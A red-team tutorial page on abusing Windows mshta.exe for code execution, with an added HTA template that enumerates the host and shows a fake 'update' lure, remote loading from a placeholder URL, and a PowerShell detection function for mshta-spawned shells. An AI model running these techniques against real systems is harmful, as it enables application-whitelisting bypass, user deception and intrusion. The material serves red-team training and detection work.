Red Team Notes

MSHTA

Microsoft HTML Applications


Last updated 5 years ago


Mshta.exe is a Windows utility that executes Microsoft HTML Applications (HTA). HTA files have the .hta extension. HTAs are standalone applications that run using the same models and technologies as Internet Explorer, but outside of the browser.

Adversaries can use mshta.exe to proxy the execution of malicious .hta files, JavaScript or VBScript through a trusted Windows utility. There are several examples of different threats leveraging mshta.exe during initial compromise and for code execution.

Code can be executed as an inline script on the command line, from a local .hta file, or directly from a URL. Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta executes outside of the Internet Explorer security context, it also bypasses browser security settings such as zone restrictions.

Some examples of mshta running (the original page shows these as screenshots):

In this demo I execute a VBScript one-liner that just calls a simple MsgBox to prove the code ran, but can we go a bit further? What about using this for enumeration, or calling a shell?

A shell caught with Metasploit's handler.

What about some social engineering, asking the user to install an "update"? We can modify the HTA so that when they click OK they are asked to download and execute a file of our choice.

Can we do it from a remote host without first dropping a file on the target machine? MSHTA can also load a file from a remote server; the syntax is as simple as mshta http://IP/File.hta. In this example the HTA file executes calc.exe. Note that mshta still fetches the file over HTTP itself (and may cache it locally), and the URL is recorded in the process's command line, so "no download" means no file written by the operator, not no trace.
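The demos above in one file, as an added example that is not code from the original notes: a benign HTA that shows the MsgBox, runs a few enumeration commands and shows their output, presents the fake "update" prompt, and launches calc.exe instead of a downloaded payload. The PowerShell wrapper writes it to a hypothetical path under %TEMP% and then launches mshta.exe in the three forms the page describes (local file, inline script, remote URL). The file name is an assumption; the remote URL is the page's own placeholder and stays commented out.

```powershell
# Added example, not code from the original notes: one HTA that bundles the
# page's demos (MsgBox, enumeration, a fake "update" prompt, calc.exe), written
# to a hypothetical path and launched in the three forms mshta.exe accepts.
# Assumes a Windows host; the only thing the HTA ever runs is calc.exe.
$HtaPath = Join-Path $env:TEMP 'mshta-demo.hta'   # hypothetical file name

# Single-quoted here-string: PowerShell expands nothing inside it, so the
# VBScript reaches the file exactly as written.
$Hta = @'
<html>
<head>
<title>Windows Update</title>
<!-- HTA:APPLICATION marks this as an application: mshta runs it with the
     rights of the logged-on user and none of Internet Explorer's zone rules. -->
<HTA:APPLICATION ID="demo" APPLICATIONNAME="Update" />
<script language="VBScript">
  Set sh = CreateObject("WScript.Shell")

  ' Demo 1: prove execution (the MsgBox one-liner, now inside a file).
  MsgBox "Code executed via mshta.exe", vbInformation, "Update"

  ' Demo 2: enumeration. Exec captures stdout. Note the cost: this makes
  ' mshta.exe the parent of cmd.exe, which is exactly what defenders look for.
  Set proc = sh.Exec("cmd.exe /c whoami /groups & hostname & ipconfig")
  info = proc.StdOut.ReadAll()

  ' Demo 3: social engineering. Only a click on OK runs the payload. The page
  ' downloads and executes an operator-chosen file here; this example starts
  ' calc.exe instead so it is safe to run.
  If MsgBox("A critical update is available. Install now?", vbOKCancel + vbExclamation, "Update") = vbOK Then
      sh.Run "calc.exe", 1, False
  End If

  ' Runs once the window exists; shows the enumeration output.
  Sub Window_OnLoad
      window.resizeTo 700, 500
      document.getElementById("out").innerText = info
  End Sub
</script>
</head>
<body><pre id="out"></pre></body>
</html>
'@
Set-Content -Path $HtaPath -Value $Hta -Encoding ASCII

# Form 1: a local .hta file.
Start-Process -FilePath mshta.exe -ArgumentList "`"$HtaPath`""

# Form 2: inline script, nothing on disk. Execute() evaluates the VBScript and
# close ends the invisible window. The whole script lands in the process
# command line, where Sysmon Event ID 1 or 4688 auditing records it.
Start-Process -FilePath mshta.exe -ArgumentList 'vbscript:Execute("MsgBox ""Inline code executed"":close")'

# Form 3: a remote HTA. mshta fetches it over HTTP(S) or a UNC path and runs it;
# http://IP/File.hta is the page's placeholder, so this line stays commented.
# Start-Process -FilePath mshta.exe -ArgumentList 'http://IP/File.hta'
```

Start-Process is used rather than the call operator because PowerShell would otherwise re-quote the inline vbscript: argument and break mshta's parsing of it. Swap the calc.exe line for whatever the engagement calls for; the download-and-execute variant the page mentions goes in the same place.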

These are a few of the many ways to use mshta to execute code; the rest is creativity about what it can be used for and how it can help on a red team engagement. We talked about how it can get past AV and application whitelisting and avoid leaving a suspicious dropped binary, but any experienced blue team analyst can tell you that it is very strange for mshta.exe to spawn cmd.exe, so this only minimizes the footprint rather than removing it. Process-creation telemetry (Sysmon Event ID 1, or Windows event 4688 with command-line auditing enabled) records mshta.exe as the parent of cmd.exe, and the inline vbscript: form puts the entire script in the logged command line.

Figure captions (screenshots not included): VBScript one-liner; HTA file shell; calling calc.exe.
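The blue-team check the closing paragraph alludes to, as an added example that is not part of the original notes: a PowerShell function that runs over process-creation events (the Image, ParentImage and CommandLine fields that Sysmon Event ID 1 or Security event 4688 provide) and flags the patterns each of the page's demos leaves behind. The events at the bottom are constructed to mirror those demos plus one benign control; they are not captured from a real host. The function name and field names are assumptions.

```powershell
# Added example, not from the original notes: what mshta abuse looks like in
# process-creation telemetry. Input objects need Image, ParentImage and
# CommandLine (Sysmon EID 1 / Security 4688 field names); the sample events
# below are constructed, not real captures.
function Find-SuspiciousMshta {
    param([Parameter(Mandatory, ValueFromPipeline)] [psobject] $Event)
    begin {
        # Children an HTA has no legitimate reason to spawn.
        $shells = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe',
                  'cscript.exe', 'rundll32.exe', 'regsvr32.exe'
    }
    process {
        $image  = ([IO.Path]::GetFileName([string] $Event.Image)).ToLowerInvariant()
        $parent = ([IO.Path]::GetFileName([string] $Event.ParentImage)).ToLowerInvariant()
        $cmd    = [string] $Event.CommandLine
        $why    = @()

        # The "HTA file shell" demo: mshta.exe as parent of a shell or script host.
        if ($parent -eq 'mshta.exe') {
            $kind = if ($image -in $shells) { 'a script host' } else { 'a child process' }
            $why += "mshta.exe spawned $kind ($image)"
        }
        # The one-liner demo: the script itself is in the command line.
        if ($image -eq 'mshta.exe' -and $cmd -match '\b(vbscript|javascript):') {
            $why += 'inline script in command line'
        }
        # The remote demo: HTA pulled over HTTP(S) or from a UNC path.
        if ($image -eq 'mshta.exe' -and $cmd -match '(https?://|\\\\[^\\]+\\)') {
            $why += 'HTA loaded from a remote location'
        }
        # Dropped HTAs usually live in user-writable directories.
        if ($image -eq 'mshta.exe' -and $cmd -match '\\(temp|appdata|downloads|public)\\') {
            $why += 'HTA run from a user-writable path'
        }

        if ($why) {
            [pscustomobject]@{
                UtcTime     = $Event.UtcTime
                Image       = $image
                Parent      = $parent
                CommandLine = $cmd
                Reason      = $why -join '; '
            }
        }
    }
}

# Constructed sample events mirroring the page's demos, plus a benign control.
$events = @(
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:01'; Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'mshta vbscript:Execute("MsgBox ""Code executed"":close")' }
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:02'; Image = 'C:\Windows\System32\cmd.exe'
                       ParentImage = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'cmd.exe /c whoami /groups' }
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:03'; Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'mshta http://IP/File.hta' }
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:04'; Image = 'C:\Windows\System32\calc.exe'
                       ParentImage = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'calc.exe' }
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:05'; Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = '"C:\Program Files\Vendor\tool.hta"' }   # benign control
)

# Four hits; the vendor HTA under Program Files with no child process is not flagged.
$events | Find-SuspiciousMshta | Format-Table -AutoSize -Wrap
```

Against live data, feed the function with objects built from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log (Event ID 1) after extracting the Image, ParentImage and CommandLine fields from each event's XML. The parent-child rule is the one that survives obfuscation: the command line can be disguised, but mshta.exe spawning cmd.exe cannot.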